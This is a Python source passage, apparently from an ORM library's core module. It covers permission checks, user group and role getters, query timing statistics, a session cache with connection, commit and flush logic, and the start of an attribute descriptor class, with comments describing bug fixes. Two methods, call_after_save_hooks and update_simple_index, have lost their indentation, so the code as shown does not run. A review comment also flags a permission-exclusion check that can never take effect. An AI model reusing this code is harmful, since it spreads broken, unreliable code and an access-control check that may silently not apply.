    if isinstance(x, EntityMeta):
        for rule in access_rules:
            if user_groups.issuperset(rule.groups) and entity not in rule.entities_to_exclude:
                result = True
                break
    elif isinstance(x, Attribute):
        attr = x
        for rule in access_rules:
            if user_groups.issuperset(rule.groups) and entity not in rule.entities_to_exclude \
               and attr not in rule.attrs_to_exclude:
                result = True
                break
            reverse = attr.reverse
            if reverse:
                reverse_rules = reverse.entity._access_rules_.get(perm)
                if not reverse_rules: return False
                # Bug fix: iterate the reverse side's rules (`reverse_rules`);
                # the loop previously iterated `access_rules` again, checking
                # the direct rules against the reverse attribute.
                for reverse_rule in reverse_rules:
                    if user_groups.issuperset(reverse_rule.groups) \
                       and reverse.entity not in reverse_rule.entities_to_exclude \
                       and reverse not in reverse_rule.attrs_to_exclude:
                        result = True
                        break
            if result: break
    else:
        obj = x
        user_roles = get_user_roles(user, obj)
        obj_labels = get_object_labels(obj)
        for rule in access_rules:
            # NOTE(review): `x` here is an instance while entities_to_exclude
            # holds classes, so this `continue` can never fire -- possibly
            # `entity in ...` was intended; left unchanged pending confirmation.
            if x in rule.entities_to_exclude: continue
            elif not user_groups.issuperset(rule.groups): pass
            elif not user_roles.issuperset(rule.roles): pass
            elif not obj_labels.issuperset(rule.labels): pass
            else:
                result = True
                break
    # Bug fix: cache under the queried object `x` (the key that the
    # perm_cache.get(x) lookup above reads), not under `perm`.
    perm_cache[x] = result
    return result
def can_view(user, x):
    """True if `user` may view `x` (either 'view' or 'edit' permission)."""
    return has_perm(user, 'view', x) or has_perm(user, 'edit', x)
def can_edit(user, x):
    """True if `user` may edit `x`."""
    return has_perm(user, 'edit', x)
def can_create(user, x):
    """True if `user` may create `x`."""
    return has_perm(user, 'create', x)
def can_delete(user, x):
    """True if `user` may delete `x`."""
    return has_perm(user, 'delete', x)
def get_current_user():
    """Return the thread-local user set via set_current_user()."""
    return local.current_user
def set_current_user(user):
    """Set the current (thread-local) user for permission checks."""
    local.current_user = user
anybody_frozenset = frozenset(['anybody'])
def get_user_groups(user):
    # Return the frozenset of group names for `user`, gathered from all
    # registered user_groups_getter functions; always contains 'anybody'.
    # Results are cached per thread.
    cached = local.user_groups_cache.get(user)
    if cached is not None: return cached
    if user is None: return anybody_frozenset
    groups = {'anybody'}
    for cls, func in usergroup_functions:
        if cls is not None and not isinstance(user, cls): continue
        found = func(user)
        if isinstance(found, basestring): groups.add(found) # single group name
        elif found is not None: groups.update(found)
    groups = frozenset(groups)
    local.user_groups_cache[user] = groups
    return groups
def get_user_roles(user, obj):
    # Return the frozenset of role names `user` has with respect to `obj`,
    # gathered from all registered user_roles_getter functions ('self' is
    # added when user and obj are the same object).  Cached per (user, obj).
    if user is None: return frozenset()
    roles_cache = local.user_roles_cache[user]
    cached = roles_cache.get(obj)
    if cached is not None: return cached
    roles = {'self'} if user is obj else set()
    for user_cls, obj_cls, func in userrole_functions:
        if user_cls is not None and not isinstance(user, user_cls): continue
        if obj_cls is not None and not isinstance(obj, obj_cls): continue
        found = func(user, obj)
        if isinstance(found, basestring): roles.add(found) # single role name
        elif found is not None: roles.update(found)
    roles = frozenset(roles)
    roles_cache[obj] = roles
    return roles
def get_object_labels(obj):
    # Return the set of labels attached to `obj`, gathered from all registered
    # obj_labels_getter functions; cached in the object's session cache.
    labels_cache = obj._database_._get_cache().obj_labels_cache
    labels = labels_cache.get(obj)
    if labels is None:
        labels = set()
        for obj_cls, func in objlabel_functions:
            if obj_cls is not None and not isinstance(obj, obj_cls): continue
            found = func(obj)
            if isinstance(found, basestring): labels.add(found) # single label name
            elif found is not None: labels.update(found)
        labels_cache[obj] = labels
    return labels
usergroup_functions = []
def user_groups_getter(cls=None):
    # Decorator factory: register `func` as a provider of group names for
    # users (optionally only for users of class `cls`).
    def decorator(func):
        # Bug fix: the registry holds (cls, func) pairs, so the duplicate
        # check must test the pair; testing `func` alone never matched and
        # allowed the same registration to be appended repeatedly.
        if (cls, func) not in usergroup_functions:
            usergroup_functions.append((cls, func))
        return func
    return decorator
userrole_functions = []
def user_roles_getter(user_cls=None, obj_cls=None):
    # Decorator factory: register `func` as a provider of role names for a
    # (user, object) pair, optionally filtered by user and object classes.
    def decorator(func):
        # Bug fix: registry entries are (user_cls, obj_cls, func) triples, so
        # membership must be checked against the triple; checking `func`
        # alone never matched and allowed duplicate registrations.
        if (user_cls, obj_cls, func) not in userrole_functions:
            userrole_functions.append((user_cls, obj_cls, func))
        return func
    return decorator
objlabel_functions = []
def obj_labels_getter(cls=None):
    # Decorator factory: register `func` as a provider of labels for objects
    # (optionally only for objects of class `cls`).
    def decorator(func):
        # Bug fix: the registry holds (cls, func) pairs; check the pair, not
        # `func` alone (which never matched, allowing duplicates).
        if (cls, func) not in objlabel_functions:
            objlabel_functions.append((cls, func))
        return func
    return decorator
class DbLocal(localbase):
    # Per-thread Database state: accumulated query statistics and the text of
    # the most recently executed SQL statement.
    def __init__(dblocal):
        dblocal.stats = {}       # sql text -> QueryStat
        dblocal.last_sql = None
class QueryStat(object):
    # Accumulated timing statistics for a single SQL statement: how often it
    # hit the database vs. the local cache, and min/max/sum of DB durations.
    def __init__(stat, sql, query_start_time=None):
        stat.sql = sql
        if query_start_time is None:
            # Served from the local cache -- no database round-trip was made.
            stat.min_time = stat.max_time = stat.sum_time = None
            stat.db_count = 0
            stat.cache_count = 1
        else:
            duration = time() - query_start_time
            stat.min_time = stat.max_time = stat.sum_time = duration
            stat.db_count = 1
            stat.cache_count = 0
    def copy(stat):
        # Shallow clone without invoking __init__.
        clone = object.__new__(QueryStat)
        clone.__dict__.update(stat.__dict__)
        return clone
    def query_executed(stat, query_start_time):
        # Record one database execution that started at `query_start_time`.
        duration = time() - query_start_time
        if not stat.db_count:
            stat.min_time = stat.max_time = stat.sum_time = duration
        else:
            # builtins.min/max: this module shadows min/max with query funcs.
            stat.min_time = builtins.min(stat.min_time, duration)
            stat.max_time = builtins.max(stat.max_time, duration)
            stat.sum_time += duration
        stat.db_count += 1
    def merge(stat, stat2):
        # Fold another QueryStat for the same SQL text into this one.
        assert stat.sql == stat2.sql
        if stat2.db_count:
            if not stat.db_count:
                stat.min_time = stat2.min_time
                stat.max_time = stat2.max_time
                stat.sum_time = stat2.sum_time
            else:
                stat.min_time = builtins.min(stat.min_time, stat2.min_time)
                stat.max_time = builtins.max(stat.max_time, stat2.max_time)
                stat.sum_time += stat2.sum_time
        stat.db_count += stat2.db_count
        stat.cache_count += stat2.cache_count
    @property
    def avg_time(stat):
        # Mean DB execution time, or None if the statement never hit the DB.
        return stat.sum_time / stat.db_count if stat.db_count else None
# Monotonically increasing number assigned to each SessionCache instance.
num_counter = itertools.count()
class SessionCache(object):
    def __init__(cache, database):
        # One unit of work for a db_session: identity map, pending changes and
        # connection/transaction state for a single Database.
        cache.is_alive = True
        cache.num = next(num_counter)  # session sequence number (diagnostics)
        cache.database = database
        cache.objects = set()          # all entity instances alive in this session
        cache.indexes = defaultdict(dict)
        cache.seeds = defaultdict(set) # pk_attrs -> objects known by pk only (loaded on demand)
        cache.max_id_cache = {}
        cache.collection_statistics = {}
        cache.for_update = set()       # objects fetched with FOR UPDATE
        cache.noflush_counter = 0      # >0 while flush() is disabled (see flush_disabled)
        cache.modified_collections = defaultdict(set)
        cache.objects_to_save = []
        cache.saved_objects = []       # (obj, status) pairs awaiting _after_save_ hooks
        cache.query_results = {}
        cache.modified = False
        cache.db_session = db_session = local.db_session
        cache.immediate = db_session is not None and db_session.immediate
        cache.connection = None
        cache.in_transaction = False
        cache.saved_fk_state = None
        cache.perm_cache = defaultdict(lambda : defaultdict(dict)) # user -> perm -> cls_or_attr_or_obj -> bool
        cache.user_roles_cache = defaultdict(dict) # user -> obj -> roles
        cache.obj_labels_cache = {} # obj -> labels
    def connect(cache):
        # Acquire a connection from the provider and set the transaction mode
        # on it.  Must only be called while no connection is held; refuses to
        # continue a transaction whose connection previously failed.
        assert cache.connection is None
        if cache.in_transaction: throw(ConnectionClosedError,
            'Transaction cannot be continued because database connection failed')
        database = cache.database
        provider = database.provider
        connection, is_new_connection = provider.connect()
        if is_new_connection:
            database.call_on_connect(connection)
        try:
            provider.set_transaction_mode(connection, cache) # can set cache.in_transaction
        except:
            # Drop the broken connection before propagating the error.
            provider.drop(connection, cache)
            raise
        cache.connection = connection
        return connection
    def reconnect(cache, exc):
        # Drop the failed connection and open a fresh one.  If `exc` is not a
        # reconnectable error according to the provider, re-raise the original
        # exception instead.  `exc` may be None when no connection exists yet.
        provider = cache.database.provider
        if exc is not None:
            exc = getattr(exc, 'original_exc', exc)
            if not provider.should_reconnect(exc): reraise(*sys.exc_info())
            if local.debug: log_orm('CONNECTION FAILED: %s' % exc)
            connection = cache.connection
            assert connection is not None
            cache.connection = None
            provider.drop(connection, cache)
        else: assert cache.connection is None
        return cache.connect()
    def prepare_connection_for_query_execution(cache):
        # Return a connection that is ready for the next statement: adopt a
        # db_session that appeared after this cache was created, (re)connect
        # if needed, upgrade to immediate transaction mode, and flush pending
        # changes unless flushing is disabled.
        db_session = local.db_session
        if db_session is not None and cache.db_session is None:
            # This situation can arise when a transaction was started
            # in the interactive mode, outside of the db_session
            if cache.in_transaction or cache.modified:
                local.db_session = None
                try: cache.flush_and_commit()
                finally: local.db_session = db_session
            cache.db_session = db_session
            cache.immediate = cache.immediate or db_session.immediate
        else: assert cache.db_session is db_session, (cache.db_session, db_session)
        connection = cache.connection
        if connection is None: connection = cache.connect()
        elif cache.immediate and not cache.in_transaction:
            provider = cache.database.provider
            try: provider.set_transaction_mode(connection, cache) # can set cache.in_transaction
            except Exception as e: connection = cache.reconnect(e)
        if not cache.noflush_counter and cache.modified: cache.flush()
        return connection
    def flush_and_commit(cache):
        # Flush pending changes (rolling back on failure), then commit;
        # commit-time errors are re-raised wrapped as CommitException.
        try: cache.flush()
        except:
            cache.rollback()
            raise
        try: cache.commit()
        except: transact_reraise(CommitException, [sys.exc_info()])
    def commit(cache):
        # Flush pending changes and commit the open transaction (if any);
        # any failure triggers a rollback which also closes the session.
        assert cache.is_alive
        try:
            if cache.modified: cache.flush()
            if cache.in_transaction:
                assert cache.connection is not None
                cache.database.provider.commit(cache.connection, cache)
            # Per-transaction state is stale after commit.
            cache.for_update.clear()
            cache.query_results.clear()
            cache.max_id_cache.clear()
            # Subsequent statements start the next transaction eagerly.
            cache.immediate = True
        except:
            cache.rollback()
            raise
    def rollback(cache):
        # Close the session, rolling back any open transaction.
        cache.close(rollback=True)
    def release(cache):
        # Close the session without rollback (no transaction may be open).
        cache.close(rollback=False)
    def close(cache, rollback=True):
        # Tear the session down: return (or drop) the connection and detach or
        # invalidate the session's objects depending on db_session.strict.
        assert cache.is_alive
        if not rollback: assert not cache.in_transaction
        database = cache.database
        x = local.db2cache.pop(database); assert x is cache
        cache.is_alive = False
        provider = database.provider
        connection = cache.connection
        if connection is None: return
        cache.connection = None
        try:
            if rollback:
                try: provider.rollback(connection, cache)
                except:
                    # Rollback failed: the connection is unusable, drop it.
                    provider.drop(connection, cache)
                    raise
            provider.release(connection, cache)
        finally:
            db_session = cache.db_session or local.db_session
            if db_session:
                if db_session.strict:
                    # Strict mode: objects become fully unusable afterwards.
                    for obj in cache.objects:
                        obj._vals_ = obj._dbvals_ = obj._session_cache_ = None
                    cache.perm_cache = cache.user_roles_cache = cache.obj_labels_cache = None
                else:
                    # Non-strict: keep loaded attribute values, but drop
                    # collections that were only partially loaded.
                    for obj in cache.objects:
                        obj._dbvals_ = obj._session_cache_ = None
                        for attr, setdata in iteritems(obj._vals_):
                            if attr.is_collection:
                                if not setdata.is_fully_loaded: obj._vals_[attr] = None
            # Break reference cycles and make later misuse fail fast.
            cache.objects = cache.objects_to_save = cache.saved_objects = cache.query_results \
                = cache.indexes = cache.seeds = cache.for_update = cache.max_id_cache \
                = cache.modified_collections = cache.collection_statistics = None
    @contextmanager
    def flush_disabled(cache):
        # Temporarily suppress automatic flushing; re-entrant via a counter.
        cache.noflush_counter += 1
        try: yield
        finally: cache.noflush_counter -= 1
    def flush(cache):
        # Save all modified objects and collection changes to the database.
        # _before_save_/_after_save_ hooks may modify further objects, so the
        # loop repeats until a fixed point is reached (at most 50 iterations).
        if cache.noflush_counter: return
        assert cache.is_alive
        assert not cache.saved_objects
        if not cache.immediate: cache.immediate = True
        for i in xrange(50):
            if not cache.modified: return
            with cache.flush_disabled():
                for obj in cache.objects_to_save: # can grow during iteration
                    if obj is not None: obj._before_save_()
                cache.query_results.clear()
                modified_m2m = cache._calc_modified_m2m()
                # remove m2m links before saving rows, add them afterwards
                for attr, (added, removed) in iteritems(modified_m2m):
                    if not removed: continue
                    attr.remove_m2m(removed)
                for obj in cache.objects_to_save:
                    if obj is not None: obj._save_()
                for attr, (added, removed) in iteritems(modified_m2m):
                    if not added: continue
                    attr.add_m2m(added)
                cache.max_id_cache.clear()
                cache.modified_collections.clear()
                cache.objects_to_save[:] = ()
                cache.modified = False
            cache.call_after_save_hooks()
        else:
            if cache.modified: throw(TransactionError,
                'Recursion depth limit reached in obj._after_save_() call')
def call_after_save_hooks(cache):
saved_objects = cache.saved_objects
cache.saved_objects = []
for obj, status in saved_objects:
obj._after_save_(status)
    def _calc_modified_m2m(cache):
        # Collect pending many-to-many link changes as {attr: (added, removed)}
        # where added/removed are sets of (obj, obj2) pairs.  Sorting on
        # (entity name, attribute name) makes the processing order deterministic.
        modified_m2m = {}
        for attr, objects in sorted(iteritems(cache.modified_collections),
                                    key=lambda pair: (pair[0].entity.__name__, pair[0].name)):
            if not isinstance(attr, Set): throw(NotImplementedError)
            reverse = attr.reverse
            if not reverse.is_collection:
                # one-to-many side is persisted via the foreign-key column;
                # just reset the tracking sets
                for obj in objects:
                    setdata = obj._vals_[attr]
                    setdata.added = setdata.removed = setdata.absent = None
                continue
            if not isinstance(reverse, Set): throw(NotImplementedError)
            if reverse in modified_m2m: continue  # already collected from the other side
            added, removed = modified_m2m.setdefault(attr, (set(), set()))
            for obj in objects:
                setdata = obj._vals_[attr]
                if setdata.added:
                    for obj2 in setdata.added: added.add((obj, obj2))
                if setdata.removed:
                    for obj2 in setdata.removed: removed.add((obj, obj2))
                if obj._status_ == 'marked_to_delete': del obj._vals_[attr]
                else: setdata.added = setdata.removed = setdata.absent = None
        cache.modified_collections.clear()
        return modified_m2m
def update_simple_index(cache, obj, attr, old_val, new_val, undo):
assert old_val != new_val
cache_index = cache.indexes[attr]
if new_val is not None:
obj2 = cache_index.setdefault(new_val, obj)
if obj2 is not obj: throw(CacheIndexError, 'Cannot update %s.%s: %s with key %s already exists'
% (obj.__class__.__name__, attr.name, obj2, new_val))
if old_val is not None: del cache_index[old_val]
undo.append((cache_index, old_val, new_val))
    def db_update_simple_index(cache, obj, attr, old_dbval, new_dbval):
        # Update the unique index when a new *database* value is observed for
        # attr; here a clash means the database row conflicts with an object
        # already tracked in this session.
        assert old_dbval != new_dbval
        cache_index = cache.indexes[attr]
        if new_dbval is not None:
            obj2 = cache_index.setdefault(new_dbval, obj)
            if obj2 is not obj: throw(TransactionIntegrityError,
                '%s with unique index %s.%s already exists: %s'
                % (obj2.__class__.__name__, obj.__class__.__name__, attr.name, new_dbval))
                # attribute which was created or updated lately clashes with one stored in database
        cache_index.pop(old_dbval, None)
    def update_composite_index(cache, obj, attrs, prev_vals, new_vals, undo):
        # Maintain the in-memory index for a composite key.  A key tuple that
        # contains None is not indexed at all.
        assert prev_vals != new_vals
        if None in prev_vals: prev_vals = None
        if None in new_vals: new_vals = None
        if prev_vals is None and new_vals is None: return
        cache_index = cache.indexes[attrs]
        if new_vals is not None:
            obj2 = cache_index.setdefault(new_vals, obj)
            if obj2 is not obj:
                attr_names = ', '.join(attr.name for attr in attrs)
                throw(CacheIndexError, 'Cannot update %r: composite key (%s) with value %s already exists for %r'
                                       % (obj, attr_names, new_vals, obj2))
        if prev_vals is not None: del cache_index[prev_vals]
        undo.append((cache_index, prev_vals, new_vals))
    def db_update_composite_index(cache, obj, attrs, prev_vals, new_vals):
        # Composite-key analogue of db_update_simple_index: a clash with a
        # value arriving from the database is a transaction integrity error.
        assert prev_vals != new_vals
        cache_index = cache.indexes[attrs]
        if None not in new_vals:
            obj2 = cache_index.setdefault(new_vals, obj)
            if obj2 is not obj:
                key_str = ', '.join(repr(item) for item in new_vals)
                throw(TransactionIntegrityError, '%s with unique index (%s) already exists: %s'
                      % (obj2.__class__.__name__, ', '.join(attr.name for attr in attrs), key_str))
        cache_index.pop(prev_vals, None)
class NotLoadedValueType(object):
    """Type of the NOT_LOADED sentinel: the attribute value was not fetched yet."""
    def __repr__(self):
        return 'NOT_LOADED'

NOT_LOADED = NotLoadedValueType()
class DefaultValueType(object):
    """Type of the DEFAULT sentinel: use the attribute's declared default value."""
    def __repr__(self):
        return 'DEFAULT'

DEFAULT = DefaultValueType()
class DescWrapper(object):
    """Wraps an attribute to mark it for descending sort order."""
    def __init__(self, attr):
        self.attr = attr
    def __repr__(self):
        return '<DescWrapper(%s)>' % self.attr
    def __call__(self):
        # Calling the wrapper yields the wrapper itself.
        return self
    def __eq__(self, other):
        if type(other) is not DescWrapper:
            return False
        return self.attr == other.attr
    def __ne__(self, other):
        # Explicit inverse of __eq__ (needed on Python 2).
        return not self.__eq__(other)
    def __hash__(self):
        # Offset by one so the wrapper never collides with the bare attribute.
        return hash(self.attr) + 1
attr_id_counter = itertools.count(1)
class Attribute(object):
    """Base descriptor for entity attributes.

    Concrete subclasses are Required, Optional, PrimaryKey, Discriminator and
    the Collection hierarchy.  An Attribute carries the mapping metadata
    (columns, converters, reverse attribute, index participation) and
    implements the descriptor protocol that reads/writes values on entity
    instances while keeping session-cache indexes and reverse relationships
    consistent.
    """
    __slots__ = 'nullable', 'is_required', 'is_discriminator', 'is_unique', 'is_part_of_unique_index', \
        'is_pk', 'is_collection', 'is_relation', 'is_basic', 'is_string', 'is_volatile', 'is_implicit', \
        'id', 'pk_offset', 'pk_columns_offset', 'py_type', 'sql_type', 'entity', 'name', \
        'lazy', 'lazy_sql_cache', 'args', 'auto', 'default', 'reverse', 'composite_keys', \
        'column', 'columns', 'col_paths', '_columns_checked', 'converters', 'kwargs', \
        'cascade_delete', 'index', 'original_default', 'sql_default', 'py_check', 'hidden', \
        'optimistic', 'fk_name'
    def __deepcopy__(attr, memo):
        return attr # Attribute cannot be cloned by deepcopy()
    @cut_traceback
    def __init__(attr, py_type, *args, **kwargs):
        """Parse and validate declaration-time options.

        The attribute is bound to its entity/name later, in _init_(), once the
        EntityMeta metaclass processes the class body.
        """
        if attr.__class__ is Attribute: throw(TypeError, "'Attribute' is abstract type")
        attr.is_implicit = False
        attr.is_required = isinstance(attr, Required)
        attr.is_discriminator = isinstance(attr, Discriminator)
        attr.is_unique = kwargs.pop('unique', None)
        if isinstance(attr, PrimaryKey):
            if attr.is_unique is not None:
                throw(TypeError, "'unique' option cannot be set for PrimaryKey attribute ")
            attr.is_unique = True
        attr.nullable = kwargs.pop('nullable', None)
        attr.is_part_of_unique_index = attr.is_unique # Also can be set to True later
        attr.is_pk = isinstance(attr, PrimaryKey)
        if attr.is_pk: attr.pk_offset = 0
        else: attr.pk_offset = None
        attr.id = next(attr_id_counter)
        if not isinstance(py_type, (type, basestring, types.FunctionType)):
            if py_type is datetime: throw(TypeError,
                'datetime is the module and cannot be used as attribute type. Use datetime.datetime instead')
            throw(TypeError, 'Incorrect type of attribute: %r' % py_type)
        attr.py_type = py_type
        attr.is_string = type(py_type) is type and issubclass(py_type, basestring)
        attr.is_collection = isinstance(attr, Collection)
        # a string/function py_type is a forward reference to another entity
        attr.is_relation = isinstance(attr.py_type, (EntityMeta, basestring, types.FunctionType))
        attr.is_basic = not attr.is_collection and not attr.is_relation
        attr.sql_type = kwargs.pop('sql_type', None)
        attr.entity = attr.name = None
        attr.args = args
        attr.auto = kwargs.pop('auto', False)
        attr.cascade_delete = kwargs.pop('cascade_delete', None)
        attr.reverse = kwargs.pop('reverse', None)
        if not attr.reverse: pass
        elif not isinstance(attr.reverse, (basestring, Attribute)):
            throw(TypeError, "Value of 'reverse' option must be name of reverse attribute). Got: %r" % attr.reverse)
        elif not attr.is_relation:
            throw(TypeError, 'Reverse option cannot be set for this type: %r' % attr.py_type)
        attr.column = kwargs.pop('column', None)
        attr.columns = kwargs.pop('columns', None)
        if attr.column is not None:
            if attr.columns is not None:
                throw(TypeError, "Parameters 'column' and 'columns' cannot be specified simultaneously")
            if not isinstance(attr.column, basestring):
                throw(TypeError, "Parameter 'column' must be a string. Got: %r" % attr.column)
            attr.columns = [ attr.column ]
        elif attr.columns is not None:
            if not isinstance(attr.columns, (tuple, list)):
                throw(TypeError, "Parameter 'columns' must be a list. Got: %r'" % attr.columns)
            for column in attr.columns:
                if not isinstance(column, basestring):
                    throw(TypeError, "Items of parameter 'columns' must be strings. Got: %r" % attr.columns)
            if len(attr.columns) == 1: attr.column = attr.columns[0]
        else: attr.columns = []
        attr.index = kwargs.pop('index', None)
        attr.fk_name = kwargs.pop('fk_name', None)
        attr.col_paths = []
        attr._columns_checked = False
        attr.composite_keys = []
        attr.lazy = kwargs.pop('lazy', getattr(py_type, 'lazy', False))
        attr.lazy_sql_cache = None
        attr.is_volatile = kwargs.pop('volatile', False)
        attr.optimistic = kwargs.pop('optimistic', None)
        attr.sql_default = kwargs.pop('sql_default', None)
        attr.py_check = kwargs.pop('py_check', None)
        attr.hidden = kwargs.pop('hidden', False)
        # remaining kwargs are validated later (linked() rejects leftovers)
        attr.kwargs = kwargs
        attr.converters = []
    def _init_(attr, entity, name):
        """Bind the attribute to its entity and resolve default-value options."""
        attr.entity = entity
        attr.name = name
        if attr.pk_offset is not None and attr.lazy:
            throw(TypeError, 'Primary key attribute %s cannot be lazy' % attr)
        if attr.cascade_delete is not None and attr.is_basic:
            throw(TypeError, "'cascade_delete' option cannot be set for attribute %s, "
                             "because it is not relationship attribute" % attr)
        if not attr.is_required:
            if attr.is_unique and attr.nullable is False:
                throw(TypeError, 'Optional unique attribute %s must be nullable' % attr)
            if entity._root_ is not entity:
                # single-table inheritance: subclass columns must accept NULL
                if attr.nullable is False: throw(ERDiagramError,
                    'Attribute %s must be nullable due to single-table inheritance' % attr)
                attr.nullable = True
        if 'default' in attr.kwargs:
            attr.default = attr.original_default = attr.kwargs.pop('default')
            if attr.is_required:
                if attr.default is None: throw(TypeError,
                    'Default value for required attribute %s cannot be None' % attr)
                if attr.default == '': throw(TypeError,
                    'Default value for required attribute %s cannot be empty string' % attr)
            elif attr.default is None and not attr.nullable: throw(TypeError,
                'Default value for non-nullable attribute %s cannot be set to None' % attr)
        elif attr.is_string and not attr.is_required and not attr.nullable:
            # optional non-nullable strings default to empty string
            attr.default = ''
        else:
            attr.default = None
        sql_default = attr.sql_default
        if isinstance(sql_default, basestring):
            if sql_default == '': throw(TypeError,
                "'sql_default' option value cannot be empty string, "
                "because it should be valid SQL literal or expression. "
                "Try to use \"''\", or just specify default='' instead.")
        elif attr.sql_default not in (None, True, False):
            throw(TypeError, "'sql_default' option of %s attribute must be of string or bool type. Got: %s"
                             % (attr, attr.sql_default))
        if attr.py_check is not None and not callable(attr.py_check):
            throw(TypeError, "'py_check' parameter of %s attribute should be callable" % attr)
        # composite keys will be checked later inside EntityMeta.__init__
        if attr.py_type == float:
            if attr.is_pk: throw(TypeError, 'PrimaryKey attribute %s cannot be of type float' % attr)
            elif attr.is_unique: throw(TypeError, 'Unique attribute %s cannot be of type float' % attr)
        if attr.is_volatile and (attr.is_pk or attr.is_collection): throw(TypeError,
            '%s attribute %s cannot be volatile' % (attr.__class__.__name__, attr))
    def linked(attr):
        """Called once the reverse attribute is resolved: finalize cascade_delete,
        check fk_name placement and reject any unknown leftover options."""
        reverse = attr.reverse
        if attr.cascade_delete is None:
            attr.cascade_delete = attr.is_collection and reverse.is_required
        elif attr.cascade_delete:
            if reverse.cascade_delete: throw(TypeError,
                "'cascade_delete' option cannot be set for both sides of relationship "
                "(%s and %s) simultaneously" % (attr, reverse))
            if reverse.is_collection: throw(TypeError,
                "'cascade_delete' option cannot be set for attribute %s, "
                "because reverse attribute %s is collection" % (attr, reverse))
        if attr.is_collection and not reverse.is_collection:
            if attr.fk_name is not None:
                throw(TypeError, 'You should specify fk_name in %s instead of %s' % (reverse, attr))
        for option in attr.kwargs:
            throw(TypeError, 'Attribute %s has unknown option %r' % (attr, option))
    @cut_traceback
    def __repr__(attr):
        owner_name = attr.entity.__name__ if attr.entity else '?'
        return '%s.%s' % (owner_name, attr.name or '?')
    def __lt__(attr, other):
        # Attributes order by declaration id (see attr_id_counter).
        return attr.id < other.id
    def validate(attr, val, obj=None, entity=None, from_db=False):
        """Validate/convert a value for this attribute.

        Resolves the DEFAULT sentinel, applies the column converter (or, for
        relationship attributes, resolves raw pk values to an entity instance)
        and runs the optional py_check predicate.
        """
        if val is None:
            if not attr.nullable and not from_db and not attr.is_required:
                # for required attribute the exception will be thrown later with another message
                throw(ValueError, 'Attribute %s cannot be set to None' % attr)
            return val
        assert val is not NOT_LOADED
        if val is DEFAULT:
            default = attr.default
            if default is None: return None
            if callable(default): val = default()
            else: val = default
        if entity is not None: pass
        elif obj is not None: entity = obj.__class__
        else: entity = attr.entity
        reverse = attr.reverse
        if not reverse:
            if isinstance(val, Entity): throw(TypeError, 'Attribute %s must be of %s type. Got: %s'
                                                         % (attr, attr.py_type.__name__, val))
            if not attr.converters:
                return val if type(val) is attr.py_type else attr.py_type(val)
            if len(attr.converters) != 1: throw(NotImplementedError)
            converter = attr.converters[0]
            if converter is not None:
                try:
                    if from_db: return converter.sql2py(val)
                    val = converter.validate(val, obj)
                except UnicodeDecodeError as e:
                    throw(ValueError, 'Value for attribute %s cannot be converted to %s: %s'
                                      % (attr, unicode.__name__, truncate_repr(val)))
        else:
            rentity = reverse.entity
            if not isinstance(val, rentity):
                # a raw pk value (or tuple of them) is resolved to an instance
                vals = val if type(val) is tuple else (val,)
                if len(vals) != len(rentity._pk_columns_): throw(TypeError,
                    'Invalid number of columns were specified for attribute %s. Expected: %d, got: %d'
                    % (attr, len(rentity._pk_columns_), len(vals)))
                try: val = rentity._get_by_raw_pkval_(vals, from_db=from_db)
                except TypeError: throw(TypeError, 'Attribute %s must be of %s type. Got: %r'
                                                   % (attr, rentity.__name__, val))
            else:
                if obj is not None and obj._status_ is not None: cache = obj._session_cache_
                else: cache = entity._database_._get_cache()
                if cache is not val._session_cache_:
                    throw(TransactionError, 'An attempt to mix objects belonging to different transactions')
        if attr.py_check is not None and not attr.py_check(val):
            throw(ValueError, 'Check for attribute %s failed. Value: %s' % (attr, truncate_repr(val)))
        return val
    def parse_value(attr, row, offsets):
        """Extract and validate this attribute's value from a database row."""
        assert len(attr.columns) == len(offsets)
        if not attr.reverse:
            if len(offsets) > 1: throw(NotImplementedError)
            offset = offsets[0]
            val = attr.validate(row[offset], None, attr.entity, from_db=True)
        else:
            vals = [ row[offset] for offset in offsets ]
            if None in vals:
                assert len(set(vals)) == 1
                val = None
            else: val = attr.py_type._get_by_raw_pkval_(vals)
        return val
    def load(attr, obj):
        """Load the attribute value for obj from the database.

        Column-less attributes are resolved through the reverse side; lazy
        attributes use a cached per-attribute SELECT; anything else triggers a
        full object load.
        """
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('load attribute', obj, attr)
        if not attr.columns:
            reverse = attr.reverse
            assert reverse is not None and reverse.columns
            dbval = reverse.entity._find_in_db_({reverse : obj})
            if dbval is None: obj._vals_[attr] = None
            else: assert obj._vals_[attr] == dbval
            return dbval
        if attr.lazy:
            entity = attr.entity
            database = entity._database_
            if not attr.lazy_sql_cache:
                # build and cache "SELECT <attr columns> WHERE pk = ?" AST once
                select_list = [ 'ALL' ] + [ [ 'COLUMN', None, column ] for column in attr.columns ]
                from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ] ]
                pk_columns = entity._pk_columns_
                pk_converters = entity._pk_converters_
                criteria_list = [ [ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ]
                                  for i, (column, converter) in enumerate(izip(pk_columns, pk_converters)) ]
                sql_ast = [ 'SELECT', select_list, from_list, [ 'WHERE' ] + criteria_list ]
                sql, adapter = database._ast2sql(sql_ast)
                offsets = tuple(xrange(len(attr.columns)))
                attr.lazy_sql_cache = sql, adapter, offsets
            else: sql, adapter, offsets = attr.lazy_sql_cache
            arguments = adapter(obj._get_raw_pkval_())
            cursor = database._exec_sql(sql, arguments)
            row = cursor.fetchone()
            dbval = attr.parse_value(row, offsets)
            attr.db_set(obj, dbval)
        else: obj._load_()
        return obj._vals_[attr]
    @cut_traceback
    def __get__(attr, obj, cls=None):
        # Descriptor read: track read bits for optimistic concurrency checks
        # (pk attributes are exempt - they never change).
        if obj is None: return attr
        if attr.pk_offset is not None: return attr.get(obj)
        value = attr.get(obj)
        bit = obj._bits_except_volatile_[attr]
        wbits = obj._wbits_
        if wbits is not None and not wbits & bit: obj._rbits_ |= bit
        return value
    def get(attr, obj):
        """Return the attribute value for obj, loading it on demand."""
        if attr.pk_offset is None and obj._status_ in ('deleted', 'cancelled'):
            throw_object_was_deleted(obj)
        vals = obj._vals_
        if vals is None: throw_db_session_is_over('read value of', obj, attr)
        val = vals[attr] if attr in vals else attr.load(obj)
        if val is not None and attr.reverse and val._subclasses_ and val._status_ not in ('deleted', 'cancelled'):
            # the related object may still be a "seed" (pk only) - materialize it
            cache = obj._session_cache_
            if cache is not None and val in cache.seeds[val._pk_attrs_]:
                val._load_()
        return val
    @cut_traceback
    def __set__(attr, obj, new_val, undo_funcs=None):
        """Descriptor write: validate the value, update write bits, unique
        indexes and the reverse side, collecting undo actions so the whole
        change can be reverted atomically on failure."""
        cache = obj._session_cache_
